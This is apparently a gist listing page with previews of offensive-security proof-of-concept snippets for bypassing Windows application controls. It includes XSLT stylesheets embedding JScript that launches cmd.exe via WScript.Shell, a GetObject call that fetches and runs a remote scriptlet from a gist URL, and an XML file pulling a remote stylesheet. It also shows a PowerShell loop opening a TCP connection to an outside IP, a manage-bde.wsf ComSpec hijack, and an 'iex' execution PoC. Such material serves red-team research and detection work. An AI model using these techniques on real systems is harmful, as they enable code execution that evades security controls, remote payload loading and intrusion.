This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
]]> </ms:script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while ($true) { | |
$(Get-Date).ToUniversalTime() | |
$Runspace = [runspacefactory]::CreateRunspace() | |
$PowerShell = [powershell]::Create() | |
$PowerShell.runspace = $Runspace | |
$Runspace.Open() | |
[void]$PowerShell.AddScript({ | |
$tcpConnection = New-Object System.Net.Sockets.TcpClient('1.1.1.1', 80) | |
$tcpStream = $tcpConnection.GetStream() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
file | |
StaticMetafile | |
StaticDib | |
clsid | |
objref | |
ADODB.Command.6.0 | |
ADODB.Parameter.6.0 | |
ADODB.Connection.6.0 | |
ADODB.Recordset.6.0 | |
ADODB.Error.6.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:u="p" version="1.0"><ms:script implements-prefix="u" language="JScript">r=new ActiveXObject("http://WScript.Shell ").Run("cmd.exe")</ms:script></stylesheet> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
Here are a few examples that you may or may not find useful - | |
1) Replace ComSpec Variable | |
set comspec=c:\windows\system32\calc.exe | |
cscript manage-bde.wsf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
<customers> | |
<customer> | |
<name>Microsoft</name> | |
</customer> | |
</customers> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<command> | |
<a> | |
<!-- Proof Of Concept - @subTee --> | |
<!-- Proof Of Concept - @HarmJ0y --> | |
<execute>iex notepad.exe</execute> | |
</a> | |
</command> |